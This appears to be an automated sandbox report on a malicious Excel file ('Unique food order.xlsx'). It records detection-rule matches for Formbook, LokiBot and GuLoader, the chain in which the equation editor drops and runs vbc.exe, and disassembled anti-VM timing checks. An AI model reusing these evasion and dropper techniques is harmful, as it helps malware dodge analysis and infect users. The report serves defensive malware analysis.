Source: vbc.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: svchost[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature match
Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2382070172.0000000000553000.00000004.00000020.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2382070172.0000000000553000.00000004.00000020.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLSX@10/3@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Unique food order.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Unique food order.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR80B.tmp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR80B.tmp Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Console Write: ................................C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.v.b.c...e.x.e................... .......................2.........*.......*..... Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Console Write: ......................*.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........P$Ys..............*.............................&.................*..... Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Console Write: ................................C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.v.b.c...e.x.e................... .......................2.........*.......*..... Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Console Write: ......................*.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........P$Ys..............*.............................&.................*..... Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Unique food order.xlsx Virustotal: Detection: 24%
Source: Unique food order.xlsx ReversingLabs: Detection: 22%
Source: Unique food order.xlsx Virustotal: Detection: 24%
Source: Unique food order.xlsx ReversingLabs: Detection: 22%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: unknown Process created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: unknown Process created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32 Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: Unique food order.xlsx Static file information: File size 2303488 > 1048576
Source: Unique food order.xlsx Static file information: File size 2303488 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
Source: Binary string: napstat.pdb source: vbc.exe, 00000005.00000002.2360415056.0000000000090000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
Source: Binary string: napstat.pdb source: vbc.exe, 00000005.00000002.2360415056.0000000000090000.00000004.00000001.sdmp
Source: Unique food order.xlsx Initial sample: OLE indicators vbamacros = False
Source: Unique food order.xlsx Initial sample: OLE indicators vbamacros = False
Source: Unique food order.xlsx Initial sample: OLE indicators encrypted = True
Source: Unique food order.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2692, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY
Yara detected VB6 Downloader Generic
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2692, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040984F push ecx; retf 4_2_004098B0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00409D50 push edi; ret 4_2_00409D5D
Source: C:\Users\Public\vbc.exe Code function: 4_2_00409D55 push edi; ret 4_2_00409D5D
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406910 pushad ; iretd 4_2_00406914
Source: C:\Users\Public\vbc.exe Code function: 4_2_004069F5 push EF15CAC2h; ret 4_2_00406A05
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040759B push FFFFFFC6h; ret 4_2_004075A2
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406653 pushad ; iretd 4_2_00406654
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406A98 pushfd ; ret 4_2_00406A9A
Source: C:\Users\Public\vbc.exe Code function: 4_2_004082AF push FFFFFFDAh; ret 4_2_004082B2
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040A3DA push ecx; retf 4_2_0040A3DC
Source: C:\Users\Public\vbc.exe Code function: 4_2_00407FAA push esp; ret 4_2_00407FB1
Source: C:\Users\Public\vbc.exe Code function: 4_2_00407FB3 push ecx; retf 4_2_00407FBC
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040984F push ecx; retf 4_2_004098B0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00409D50 push edi; ret 4_2_00409D5D
Source: C:\Users\Public\vbc.exe Code function: 4_2_00409D55 push edi; ret 4_2_00409D5D
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406910 pushad ; iretd 4_2_00406914
Source: C:\Users\Public\vbc.exe Code function: 4_2_004069F5 push EF15CAC2h; ret 4_2_00406A05
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040759B push FFFFFFC6h; ret 4_2_004075A2
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406653 pushad ; iretd 4_2_00406654
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406A98 pushfd ; ret 4_2_00406A9A
Source: C:\Users\Public\vbc.exe Code function: 4_2_004082AF push FFFFFFDAh; ret 4_2_004082B2
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040A3DA push ecx; retf 4_2_0040A3DC
Source: C:\Users\Public\vbc.exe Code function: 4_2_00407FAA push esp; ret 4_2_00407FB1
Source: C:\Users\Public\vbc.exe Code function: 4_2_00407FB3 push ecx; retf 4_2_00407FBC
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E99DFA1 push ecx; ret 5_2_1E99DFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020BDFA1 push ecx; ret 9_2_020BDFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_000969BB push esi; ret 9_2_000969BC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0008AB07 push ds; retf 9_2_0008AB09
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00094E05 push ss; retf 9_2_00094E06
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009CEA5 push eax; ret 9_2_0009CEF8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009CEFB push eax; ret 9_2_0009CF62
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009CEF2 push eax; ret 9_2_0009CEF8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009CF5C push eax; ret 9_2_0009CF62

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: Unique food order.xlsx Stream path 'EncryptedPackage' entropy: 7.99991703704 (max. 8.0)
Source: Unique food order.xlsx Stream path 'EncryptedPackage' entropy: 7.99991703704 (max. 8.0)

Malware Analysis System Evasion:

barindex
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000314F7E second address: 0000000000314F7E instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FA1E43643A8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f add edi, edx 0x00000021 test ax, cx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dx, bx 0x0000002d cmp dword ptr [ebp+000000F8h], 00000000h 0x00000034 jne 00007FA1E436437Eh 0x00000036 test bx, cx 0x00000039 test ecx, ebx 0x0000003b test bx, cx 0x0000003e call 00007FA1E43643ECh 0x00000043 call 00007FA1E43643BAh 0x00000048 lfence 0x0000004b mov edx, dword ptr [7FFE0014h] 0x00000051 lfence 0x00000054 ret 0x00000055 mov esi, edx 0x00000057 pushad 0x00000058 rdtsc
Tries to detect Any.run
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: vbc.exe Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000314F13 second address: 0000000000314F7E instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov dword ptr [ebp+000000F8h], 00A95F60h 0x0000000d test al, bl 0x0000000f test bx, cx 0x00000012 test ecx, ebx 0x00000014 test bx, cx 0x00000017 call 00007FA1E43650BCh 0x0000001c call 00007FA1E436508Ah 0x00000021 lfence 0x00000024 mov edx, dword ptr [7FFE0014h] 0x0000002a lfence 0x0000002d ret 0x0000002e mov esi, edx 0x00000030 pushad 0x00000031 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000314F7E second address: 0000000000314F7E instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FA1E43643A8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f add edi, edx 0x00000021 test ax, cx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dx, bx 0x0000002d cmp dword ptr [ebp+000000F8h], 00000000h 0x00000034 jne 00007FA1E436437Eh 0x00000036 test bx, cx 0x00000039 test ecx, ebx 0x0000003b test bx, cx 0x0000003e call 00007FA1E43643ECh 0x00000043 call 00007FA1E43643BAh 0x00000048 lfence 0x0000004b mov edx, dword ptr [7FFE0014h] 0x00000051 lfence 0x00000054 ret 0x00000055 mov esi, edx 0x00000057 pushad 0x00000058 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000314FA0 second address: 0000000000314FA0 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FA1E436548Dh 0x0000001f popad 0x00000020 call 00007FA1E4365161h 0x00000025 lfence 0x00000028 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000001B4FA0 second address: 00000000001B4FA0 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FA1E46CBC9Dh 0x0000001f popad 0x00000020 call 00007FA1E46CB971h 0x00000025 lfence 0x00000028 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE RDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE RDTSC instruction interceptor: First address: 0000000000089B4E second address: 0000000000089B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File opened / queried: IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
